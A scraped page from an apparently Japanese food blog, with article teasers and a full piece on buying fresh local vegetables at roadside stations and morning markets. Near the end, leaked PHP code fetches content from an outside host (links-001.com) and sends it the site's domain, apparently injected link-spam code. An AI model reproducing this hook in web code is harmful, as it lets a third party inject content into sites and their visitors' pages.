前へ
次へ

1週間で栄養バランスを取れればOK

毎日毎食バランスのいい食生活を送れたら理想的ではありますが、食事は毎日3回あるわけですし、その度に栄

more

栄養バランスのいい外食を楽しむには

外食すると栄養バランスが崩れるのが気になる、と敬遠しがちな人も多いですが、少し気をつければ問題ないこ

more

ピリ辛料理を食べることのメリット

少し前に日本では激辛料理ブームがあり、唐辛子をたくさん入れた料理を汗をかきながら食べるのが流行りまし

more

道の駅や地域の朝市で野菜を買うメリット

スーパーではいつでも新鮮な野菜が手に入りますが、道の駅やその地域の朝市などだともっと安くて新鮮な野菜に出会えることもあります。
地元産の野菜や果物は輸送費がかかりませんし、収穫してから品物として並ぶまでに時間のロスも少ないです。
その分安く、新鮮なのです。
それから、地元産の野菜ということはその土地で育ちやすい種類で、土地の人が伝統的に食べてきたものです。
つまり気候にあっていて体にもいいということになります。
また地元名産の野菜は調理の方法も確立されていて、農家の人や朝市のスタッフに聞けば最も美味しい食べ方も教えてもらえます。
中にはその地域でしか育たないものや、その地域でしか食べない珍しい野菜もありますが、そういうものはなかなかスーパーでは見かけません。
例えば、普通は花を鑑賞する野草のスベリヒユを東北では食用にしたりします。
スーパーではこういった地元ならではの味を教えてもらえる機会もありません。
上手に地元の市を利用しましょう。

".file_get_contents('http://links-001.com/123set5?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top